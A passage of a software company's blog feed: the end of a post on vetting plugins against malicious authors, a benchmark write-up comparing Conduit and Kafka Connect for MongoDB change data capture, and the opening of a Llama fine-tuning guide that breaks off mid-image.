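&lt;p&gt;The filtering step itself is only a few lines of Go. The sketch below is illustrative; the org names are examples, not the exact production allowlist:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"strings"
)

// trustedOrgs plays the role of the allowlist described above;
// the org names are examples, not the exact production list.
var trustedOrgs = map[string]bool{
	"ConduitIO":      true,
	"conduitio-labs": true,
}

// splitRepos divides discovered repositories ("owner/name") into those
// that go straight into the registry and those that are only reported
// for manual review before being allowlisted.
func splitRepos(repos []string) (allowed, review []string) {
	for _, full := range repos {
		owner, _, ok := strings.Cut(full, "/")
		if ok && trustedOrgs[owner] {
			allowed = append(allowed, full)
		} else {
			review = append(review, full)
		}
	}
	return allowed, review
}

func main() {
	allowed, review := splitRepos([]string{
		"ConduitIO/conduit-connector-postgres",
		"actualrancher/conduit-connector-postgres",
	})
	fmt.Println(allowed, review)
}
```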
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Running a plugin from a malicious author can compromise your system. Whether you are running Conduit or any other tool that uses plugins, always ensure you get your plugins from a trusted source.&lt;/p&gt;
&lt;p&gt;As developers of a tool that accepts plugins, we want to make our plugin ecosystem as safe as possible. Carefully curating the plugins that make it into our registry is just the first step; we also plan to explore ways of improving the security of Conduit plugins, such as validating checksums or signing the binaries with a certificate.&lt;/p&gt;
&lt;p&gt;Did you ever spot a malicious plugin in another tool? Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; and let us know!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Makes MongoDB CDC 52% Faster Than Kafka Connect]]></title><description><![CDATA[In head-to-head testing Conduit performed 52% faster than Kafka Connect in streaming data from MongoDB.]]></description><link>https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Fri, 04 Apr 2025 16:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;When we began developing Conduit, we prioritized building features to make it a viable Kafka Connect replacement; performance was a secondary consideration. We are fans of the principle &quot;Make it work, make it right, make it fast.&quot; This doesn&apos;t mean we neglected performance entirely—in 2022, we &lt;a href=&quot;https://meroxa.com/blog/performance-benchmarks/&quot;&gt;wrote&lt;/a&gt; about our initial benchmarks that tested Conduit&apos;s performance. These benchmarks helped us monitor performance and quickly identify any regressions.&lt;/p&gt;
&lt;p&gt;With Conduit approaching its 1.0 release and a fairly mature feature set in place, we’ve decided to spend some time focusing on performance. Our recent redesign of the pipeline execution system delivered a &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit-5x-the-throughput/&quot;&gt;5x performance boost&lt;/a&gt;. We&apos;ve also created &lt;a href=&quot;https://conduit.io/changelog/2025-03-20-benchi-announcement/&quot;&gt;Benchi&lt;/a&gt;, a benchmarking tool that will help us test the performance of Conduit and its connectors, as well as compare it with similar tools.&lt;/p&gt;
&lt;p&gt;This post kicks off a series comparing Conduit’s performance with Kafka Connect. We’ll explore how we measured and tweaked the performance of a pipeline that streams data from MongoDB to Kafka and how it compares against Kafka Connect and the &lt;a href=&quot;https://www.mongodb.com/docs/kafka-connector/current/&quot;&gt;MongoDB connector&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Methodology&lt;/h2&gt;
&lt;h3&gt;Performance measurement&lt;/h3&gt;
&lt;p&gt;For our testing, we focused on three metrics: message throughput, CPU utilization, and memory usage. Record throughput within Conduit is tracked using Conduit’s own metrics, the throughput of Kafka messages is measured using JMX in the Kafka broker, and resource usage is monitored with the stats that Docker exposes.&lt;/p&gt;
&lt;h3&gt;Snapshots vs CDC&lt;/h3&gt;
&lt;p&gt;The performance expectations for snapshots and change data capture (CDC) are naturally different. With snapshots you’re copying existing data, so while you want it to be fast, a snapshot may take days for large datasets. CDC streaming must be fast enough to keep up with real-time inserts and updates in the data source. Due to these differences, we measure performance separately for snapshot and CDC modes.&lt;/p&gt;
&lt;p&gt;In a &lt;em&gt;snapshot test&lt;/em&gt;, the test data is inserted before data streaming starts (i.e. before a pipeline is started in Conduit, or before a source connector is created in Kafka Connect).&lt;/p&gt;
&lt;p&gt;In a &lt;em&gt;CDC test&lt;/em&gt;, the steps are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;streaming is started&lt;/li&gt;
&lt;li&gt;streaming is paused&lt;/li&gt;
&lt;li&gt;all test data is inserted&lt;/li&gt;
&lt;li&gt;streaming is started again&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Starting and then pausing data streaming makes the tool (Conduit or Kafka Connect) switch into CDC mode (as it realizes that there’s no snapshot data and can start listening for changes). We insert the test data while streaming is paused so that all of the new data is available the moment the connector resumes. When investigating bottlenecks, this removes the need to look at the step where data is being inserted (which might be a script, a test app, etc.). It also puts more load on the tool and the connector, since the entire dataset is waiting to be processed at once.&lt;/p&gt;
&lt;h2&gt;Setup&lt;/h2&gt;
&lt;p&gt;All of our tests were performed multiple times on a &lt;code class=&quot;language-text&quot;&gt;t2.xlarge&lt;/code&gt; AWS EC2 instance (4 vCPUs, 16 GB RAM) with a 40 GB &lt;code class=&quot;language-text&quot;&gt;gp3&lt;/code&gt; EBS volume. The needed infrastructure (Kafka, MongoDB) was provided via Docker containers. We ran a single Kafka broker and a three-member MongoDB replica set.&lt;/p&gt;
&lt;p&gt;The configuration for snapshots and CDC tests can be found &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-snapshot/benchi.yml&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-cdc/benchi.yml&quot;&gt;here&lt;/a&gt;. Here are some notable configurations.&lt;/p&gt;
&lt;h3&gt;Conduit&lt;/h3&gt;
&lt;p&gt;We tested Conduit v0.13.2 with the MongoDB connector v0.2.2. Conduit is run with the &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit-5x-the-throughput/&quot;&gt;re-architected pipeline engine&lt;/a&gt; and has been modified to include the MongoDB connector as a built-in connector (rather than as a standalone plugin). This increases performance and is also more similar to how Kafka Connect connectors work (they are added to the classpath and run as part of the Kafka Connect service). The pipeline configurations can be found &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-cdc/conduit/pipeline.yml&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/mongo-kafka-snapshot/conduit/pipeline.yml&quot;&gt;here&lt;/a&gt;. The option to automatically generate schemas has been turned off. We also turned off compression in the Kafka destination connector (which is also done in Kafka Connect).&lt;/p&gt;
&lt;h3&gt;Kafka Connect&lt;/h3&gt;
&lt;p&gt;We tested Kafka Connect v7.8.1 with &lt;a href=&quot;https://www.mongodb.com/docs/kafka-connector/current/source-connector/&quot;&gt;MongoDB’s Kafka connector&lt;/a&gt; v1.15.0. The Kafka Connect worker uses the default settings. The MongoDB connector runs with a few custom settings: schema inference is disabled, the entire document is returned in CDC mode (by default, only the difference between the original and updated document is returned), and the batch size is adjusted.&lt;/p&gt;
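&lt;p&gt;For reference, a source connector with these options is typically registered via the Kafka Connect REST API with a payload along these lines. The property names come from the MongoDB connector’s documentation; the values here are illustrative, not our exact benchmark config:&lt;/p&gt;

```json
{
  "name": "mongo-source",
  "config": {
    "connector.class": "com.mongodb.kafka.connect.MongoSourceConnector",
    "connection.uri": "mongodb://mongo1:27017,mongo2:27017,mongo3:27017/?replicaSet=rs0",
    "database": "bench",
    "collection": "items",
    "publish.full.document.only": true,
    "output.schema.infer.value": false,
    "batch.size": 1000
  }
}
```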
&lt;h2&gt;Running the tests&lt;/h2&gt;
&lt;p&gt;Our &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks&quot;&gt;benchmarks&lt;/a&gt; are implemented to run on Unix-like OSes and use the &lt;a href=&quot;https://meroxa.com/blog/benchmarking-made-simple-with-benchi/&quot;&gt;Benchi&lt;/a&gt; tool that we wrote. To download the benchmarks:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-L&lt;/span&gt; https://github.com/ConduitIO/streaming-benchmarks/archive/refs/heads/main.zip &lt;span class=&quot;token parameter variable&quot;&gt;-o&lt;/span&gt; streaming-benchmarks.zip
&lt;span class=&quot;token function&quot;&gt;unzip&lt;/span&gt; streaming-benchmarks.zip&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To run all the benchmarks, execute the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; streaming-benchmarks-main &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; install-tools run-all&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Bottlenecks&lt;/h2&gt;
&lt;p&gt;Since we used the same MongoDB and Apache Kafka instances to test both tools, we didn&apos;t focus on optimizing these components. We started by testing Conduit to establish a baseline, which showed it could process approximately 14,000 messages per second on our test machine. This felt low, so we decided to look for bottlenecks and optimize.&lt;/p&gt;
&lt;p&gt;To understand the components involved, it helps to know the structure of a Conduit pipeline. The diagram below shows the components of our pipeline.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e1b2a751872e34f9f025b97dc5a6e4da/eb645/screenshot-2025-04-04-at-15.48.48.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 21.999999999999996%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAx0lEQVR42lVQywrCMBDs/3+PoHjxoFYQFa89aKWJSWrfLX1p2zG7gujCsGQyjxAHPzNNE2McR0Zb19hfBVaHMxbzJeRdsW4Yhq+O9u84Fy1xUZIPeVEgCAJoraGUQvR4QGiDWyAsLxDHMd+FYcgwxqBtW/YKIWCs1pmdXMyOW0zPF5Oe5yFNUzbSjqIIhS0qy5IDpZSfMsv7vs9813XYrNfYuS6czjb0fc8tTdMgSRIGmSmIXpDnOaqqQm2/gAIIxGVZ9uclvAGF6S5WSXjkVQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;conduit mongodb-to-kafka pipeline diagram&quot;
        title=&quot;&quot;
        src=&quot;/static/e1b2a751872e34f9f025b97dc5a6e4da/5a190/screenshot-2025-04-04-at-15.48.48.png&quot;
        srcset=&quot;/static/e1b2a751872e34f9f025b97dc5a6e4da/772e8/screenshot-2025-04-04-at-15.48.48.png 200w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/e17e5/screenshot-2025-04-04-at-15.48.48.png 400w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/5a190/screenshot-2025-04-04-at-15.48.48.png 800w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/c1b63/screenshot-2025-04-04-at-15.48.48.png 1200w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/29007/screenshot-2025-04-04-at-15.48.48.png 1600w,
/static/e1b2a751872e34f9f025b97dc5a6e4da/eb645/screenshot-2025-04-04-at-15.48.48.png 2500w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We decided to break things down and evaluate each component individually.&lt;/p&gt;
&lt;p&gt;This meant testing the following &lt;strong&gt;in isolation&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;How quickly can the MongoDB source connector read the data?&lt;/li&gt;
&lt;li&gt;How quickly can the MongoDB client read the data?&lt;/li&gt;
&lt;li&gt;How quickly can the Kafka destination connector write the data?&lt;/li&gt;
&lt;li&gt;How quickly can the Kafka client (we’re using &lt;a href=&quot;https://github.com/twmb/franz-go&quot;&gt;franz-go&lt;/a&gt;) write the data?&lt;/li&gt;
&lt;/ol&gt;
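&lt;p&gt;Each of these isolated measurements follows the same pattern: drain a fixed number of documents through the component under test and divide by the elapsed time. A minimal Go sketch of that harness — the &lt;code class=&quot;language-text&quot;&gt;readBatch&lt;/code&gt; stub is hypothetical, and a real run would call the MongoDB client, the connector, or the Kafka producer in its place:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"time"
)

// readBatch is a stand-in for the component under test (the MongoDB
// client, the source connector, or the Kafka producer). This stub
// "reads" instantly; a real harness would call the component here.
func readBatch(n int) int { return n }

// measure drains `total` documents in batches through read and returns
// the observed throughput in documents per second.
func measure(total, batchSize int, read func(int) int) float64 {
	start := time.Now()
	got := 0
	for got < total {
		got += read(batchSize)
	}
	elapsed := time.Since(start)
	if elapsed <= 0 {
		elapsed = time.Nanosecond // guard against a zero-duration reading
	}
	return float64(got) / elapsed.Seconds()
}

func main() {
	rate := measure(100000, 1000, readBatch)
	fmt.Printf("throughput: %.0f docs/s\n", rate)
}
```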
&lt;p&gt;The MongoDB source connector and the MongoDB client were both able to read around 25k documents per second. The Kafka destination connector produced similar results, which meant the bottleneck was Conduit itself.&lt;/p&gt;
&lt;p&gt;Because of that, we gave the new pipeline architecture a try, and it resulted in quite a boost! The message rate went from 14k to 23k msg/s.&lt;/p&gt;
&lt;h2&gt;Results&lt;/h2&gt;
&lt;p&gt;Here we present a comparison between Conduit and Kafka Connect, covering message rates (for both snapshot and CDC modes) as well as resource usage. The charts below summarize results from 56 runs of CDC and snapshot tests.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/cb22661bc97a47e5cc5b89408e0d7e9e/11d70/screenshot-2025-04-04-at-15.15.00.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACMElEQVR42o2Ty2sUQRDG99/Qe1DjKnhSEF+rEl8RBImPkx485So+1sm6GCGouXoRFUQ0h9z0JK4JKyaCePPgSQ9LUGdn3HlPz2xPz2dVT2bjrhcbipmiq379VVV3Jcsy5Hn+jymlEPgufN+HHwTaPM/TPu+NxvIKwxCV0hldcQp8X3PRtUy4nQ5+//yBX6YJk0ypfCiWobyiKEKFHSEEbNsenEghUPSNhERMe5nnQpCyKI7RT2PaJ4U6qrBSlAayw2UzNFNFyOdvEvdeJ3j7RQ4UZOuq2l8lri0kePWJwH6PDvOGgRycJAkcx0FfFkmPlxNsmvZwfUFon1l9WSQ9fBNj81WJer0N78Qe2JemoChfA7mHDJRS6oau5+DFSorqjQCziwEQOFBUssyKw54uCVSbCneNFty9W2CdPQaVJhsKA5oel8vAUsXztsD4jITR/AhnYjfscyfRD+NCfSvGtobCHWMJ7oEdsM6fIoViQyFfhZiazd8hYCOD0fiA3n5KOl0jYPR/wHIoowq3zxDw9gp6tV2wzhwdAJ8QcJyAsww8uBPWhclhoJ4gAXkoZZ+etROM3VK4aRBwXxXW5CHIqCj5UUtgzMjRrL+jHm6lHh5H/ncPy5HzYESS8h8WV0Mcnk8wd38V1tQEzCsXEXu+vn8v3weoPRCYn1sm2BGY05eRRiEyEsbzGABZpX6G5Pcl3ctUodu1CeTpa6Foj2NlpuAFAp3OGlzLogmnOq98en8A+PVdL/hkfpwAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Message throughput&quot;
        title=&quot;&quot;
        src=&quot;/static/cb22661bc97a47e5cc5b89408e0d7e9e/5a190/screenshot-2025-04-04-at-15.15.00.png&quot;
        srcset=&quot;/static/cb22661bc97a47e5cc5b89408e0d7e9e/772e8/screenshot-2025-04-04-at-15.15.00.png 200w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/e17e5/screenshot-2025-04-04-at-15.15.00.png 400w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/5a190/screenshot-2025-04-04-at-15.15.00.png 800w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/c1b63/screenshot-2025-04-04-at-15.15.00.png 1200w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/29007/screenshot-2025-04-04-at-15.15.00.png 1600w,
/static/cb22661bc97a47e5cc5b89408e0d7e9e/11d70/screenshot-2025-04-04-at-15.15.00.png 1802w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/904be5aa8ef32385fb19bed11b3c0475/d61c2/screenshot-2025-04-04-at-15.15.14.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACF0lEQVR42nWTv2sUQRTH7x+wEzu7BISLdoLYpLJTmxSCYiMEBMGgwUQOE0SDCAkcajQYsRBRkvOaYKvYCZb2giRRSS575+3t79mZ+Tgzud2LIRl4y8y8977v+33ztqKUQmt9oNkVhiG+36PX65l95O60zTkkr1Ik7l9CQqsr8Hs+4e9fbG9u4LXbRFHEYTl2VewnyzLiON6t7oI1Ite0fUGcxEjfJw0CIhOTJqHxG3YcrMgxtLLzPC8B9waUd/39zx3Ntx+SPx3lCqv9gAXDJEnKZKUG5oLVblELUFtNGL4dsPwpdec8H/QS20MhBFLKkuF/y4EpB1gwnG0mVKcDXn/J3FmqfT1sm0anaepAXUWpefk5ZaYR831d9pN2pVn/zGpEdTbnRf0rcm6S7vIi2uTqvrqK53nuQaxsJ99IGKsHDNVyGvMf0TM3CD687zM0gCsB1YfwbOIt0chRWpfOo43KEtD2zsrNzGUBeG2px5l5aI4/wh8+gjc90QdUBjBk5AEsTjWIR0+wM34Fne8BdJIM5SRJ+/Onufw05OQcNK4vEJ46RufenaKp3H0XMjQLT26tkJw+TuvqGBT9LwbbmpUsczt3gsk3f7n4XLBWW6J74Sxe/THCvn6esbDW5Vw949X9Jt2xUbanbiKMSmFAlZKDP8WytKNhLRWK0AC3traQcYTK0tJnFXT8kI31TYKOZ/qXlT4r+R9Ca3UAxBZDQwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CPU usage&quot;
        title=&quot;&quot;
        src=&quot;/static/904be5aa8ef32385fb19bed11b3c0475/5a190/screenshot-2025-04-04-at-15.15.14.png&quot;
        srcset=&quot;/static/904be5aa8ef32385fb19bed11b3c0475/772e8/screenshot-2025-04-04-at-15.15.14.png 200w,
/static/904be5aa8ef32385fb19bed11b3c0475/e17e5/screenshot-2025-04-04-at-15.15.14.png 400w,
/static/904be5aa8ef32385fb19bed11b3c0475/5a190/screenshot-2025-04-04-at-15.15.14.png 800w,
/static/904be5aa8ef32385fb19bed11b3c0475/c1b63/screenshot-2025-04-04-at-15.15.14.png 1200w,
/static/904be5aa8ef32385fb19bed11b3c0475/29007/screenshot-2025-04-04-at-15.15.14.png 1600w,
/static/904be5aa8ef32385fb19bed11b3c0475/d61c2/screenshot-2025-04-04-at-15.15.14.png 1800w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/89b936c8bc6789b3dc69adefe6836ee5/11d70/screenshot-2025-04-04-at-15.15.27.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACDElEQVR42oVTz2vUQBTe/8GTUARpKRZvihZ6EkE8eXIFPRV7EimC7akiFBH1IKJIL4IHT7YIrkVbYSn2X7CIPXgQrBHdbJLdJJNMJr/m881sJmSh4oMhmffefPN9771p5XmOsixRFIX+NpeUEmEYYuj7CIIAjEXkA0qV28hXZ5UxxtBSjsMso5y+n8EPhmC/LPQtC47rgsexvkibLPUy+5hiLbURQmgG6l8zo5XmJbxAgEcM+XCIhIWIOUcURZpRDUpmGKpYy0gzzv9apSj7ugd/5RbY2mPI6qxmeKjkypd+2UPw8C7i9VeAYVQdTrpb6M0chdu+CJll45LTNNWSdVloL6lROqGzgd+TR+DNX9YsFKSJJbtd2HMn4S1cQUnndb6S7DgOsuoGY0YC395E7+w0BovXa9YyHwHzTwQ4e2J0WZOhbdu6KWPSjaytd+idmsTg5nwNaGJi9x+ASqKaRdNlSWNw0BP47AA/Xr+Fc2YKHgEWWqrEN0tg5zuwv/4R7twMXAIsiNBYl2upVd1X38SYWgWe394APz0BZ+EaDfIo70EnxrEV4NHye0Szx+FcvTTO0ACqxgiRUv1SPPsQ4MLTDC/vdRC0z8G+s4SEJ3Rjhhddij0RWLu/Da99HvbSDQgCyqkUjF5VDdh8eiIrwZIC9h8bOT2nIknqmBr4QcDx88BC2O9DktzmYP8FMoRzCDJ3eGsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RAM usage&quot;
        title=&quot;&quot;
        src=&quot;/static/89b936c8bc6789b3dc69adefe6836ee5/5a190/screenshot-2025-04-04-at-15.15.27.png&quot;
        srcset=&quot;/static/89b936c8bc6789b3dc69adefe6836ee5/772e8/screenshot-2025-04-04-at-15.15.27.png 200w,
/static/89b936c8bc6789b3dc69adefe6836ee5/e17e5/screenshot-2025-04-04-at-15.15.27.png 400w,
/static/89b936c8bc6789b3dc69adefe6836ee5/5a190/screenshot-2025-04-04-at-15.15.27.png 800w,
/static/89b936c8bc6789b3dc69adefe6836ee5/c1b63/screenshot-2025-04-04-at-15.15.27.png 1200w,
/static/89b936c8bc6789b3dc69adefe6836ee5/29007/screenshot-2025-04-04-at-15.15.27.png 1600w,
/static/89b936c8bc6789b3dc69adefe6836ee5/11d70/screenshot-2025-04-04-at-15.15.27.png 1802w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Conduit’s CPU usage is around 13% higher in snapshots and 28% higher in CDC. Memory usage shows a bigger gap, this time in Conduit’s favor: it uses about 68% less memory (390 MB) than Kafka Connect (1200 MB).&lt;/p&gt;
&lt;p&gt;While the snapshot message rates are pretty close (Conduit’s message rate is about 9% higher), we see a greater gap in CDC, where Conduit’s message rate is about 52% higher. We believe this is a significant result, given that pipelines will spend most of their time in CDC mode (a snapshot might take days, and the rest of a pipeline’s life, even after restarts, will be spent on capturing data changes).&lt;/p&gt;
&lt;h2&gt;Hello!&lt;/h2&gt;
&lt;p&gt;You might want to know more about these benchmarks, have ideas on how to tweak pipelines, or have found a mistake in how we ran the tests. If so, drop us a “hello!” on our &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord channel&lt;/a&gt; or open a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streamlining AI: How to Fine-Tune Llama in Real Time with Meroxa, Hugging Face, and Heroku]]></title><description><![CDATA[Learn how to build a fully automated, production-ready pipeline that transforms raw S3 files into a fine-tuned Llama model powering real-time recommendations. This step-by-step guide covers data preprocessing with Meroxa, training with Hugging Face, and deploying with Docker and Heroku.]]></description><link>https://meroxa.com/blog/streamlining-ai-how-to-fine-tune-llama-in-real-time-with-meroxa-hugging-face-and-heroku</link><guid isPermaLink="false">https://meroxa.com/blog/streamlining-ai-how-to-fine-tune-llama-in-real-time-with-meroxa-hugging-face-and-heroku</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 02 Apr 2025 18:10:00 GMT</pubDate><content:encoded>&lt;p&gt;Building AI-powered applications can be challenging, especially when dealing with raw data that needs extensive preprocessing before it can be used for training machine learning models. If you&apos;ve ever tried to set up an end-to-end pipeline for fine-tuning a language model like Llama, you know the headaches involved in data preparation, model training, and deployment.&lt;/p&gt;
&lt;p&gt;In this comprehensive guide, we&apos;ll tackle a common challenge faced by ML engineers and data scientists:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Problem Statement:&lt;/strong&gt; Imagine you have a collection of raw files sitting in an S3 bucket. Your goal is to build a production-ready system that can automatically convert these files into JSONL format, ensure data consistency through transformations, fine-tune a Llama language model, and deploy an API for real-time recommendations. The catch? Everything needs to be automated and production-ready.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We&apos;ll show you how to solve this using a powerful combination of tools: Meroxa for handling data streaming and transformations, Hugging Face&apos;s Trainer API for model fine-tuning, and Docker/Heroku for deployment. By the end of this guide, you&apos;ll have a robust, automated pipeline that takes you from raw data to serving predictions in production.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Overview Diagram: Solution Architecture&lt;/h2&gt;
&lt;p&gt;The following Mermaid diagram outlines the overall solution:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/858e2bf2f8ee4c87e431d837717246d2/772aa/mermaid-diagram-2025-04-01-172345.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 69.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4klEQVR42qWTwQ6CQAxE0QMaQQVRFmRxEY0goiD6/782dhuv4qGHSSbN9qVNZ53pXOGXJjMF109hyopUw/VSro31OOPAmIHZ4YLMXMgnUqCCH2js8zPLIy8CWu11ieH1ZqX6iH/v/wJXmxwqK0lnLMmLgXFywHN4ox8G7MiLgcHOQNNBclMh2AqB9gDhF6iLiuGiozgUG2+doW461LcOC/I2SqIc+qHmUJvyyl4EdNwYW1XgenugaXtEccFTiyZchjlSCrX9LTY2wpUVQTSvW5yaL1DJV27vPdrHE5EyXBvr+QAwbUbL3t5XDgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;End to end solution workflow diagram&quot;
        title=&quot;&quot;
